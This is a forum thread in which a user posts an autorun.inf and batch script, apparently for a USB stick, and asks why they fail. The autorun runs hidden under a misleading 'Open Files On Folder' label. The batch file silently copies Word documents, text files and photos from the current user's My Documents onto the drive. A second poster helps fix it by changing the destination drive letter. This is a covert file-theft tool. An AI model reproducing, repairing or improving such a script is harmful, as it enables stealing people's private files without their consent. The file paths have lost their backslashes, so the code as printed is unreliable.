SuicideCrew Posted November 18, 2007 Posted November 18, 2007 Ok I've been trying to use XCopy to copy files onto my flash drive but it doesn't transfer the files either at all or just the txt files. I don't get why this is happening. The first time I tried it only the txt files transferred but the second time I tried it only the folders (empty) transferred. I would greatly appreciate any help. Autorun [autorun] action=Open Files On Folder icon=iconsdrive.ico shellexecute=nircmd.exe execmd CALL batexeprogstart.bat shellexecute=nircmd.exe execmd CALL start.bat Start.bat mkdir G: xcopy "C:Documents and Settings%username%My Documents*.doc" G: /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.txt" G: /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.jpeg" G: /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.jpg" G: /s/c/q/r/h Quote
Supervisor Posted November 18, 2007 Posted November 18, 2007 I think you need to change the G drive because in some computer the flash will be E or I so you need to write something like this I think so test it: xcopy "C:Documents and Settings%username%My Documents*.doc" /s/c/q/r/h Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.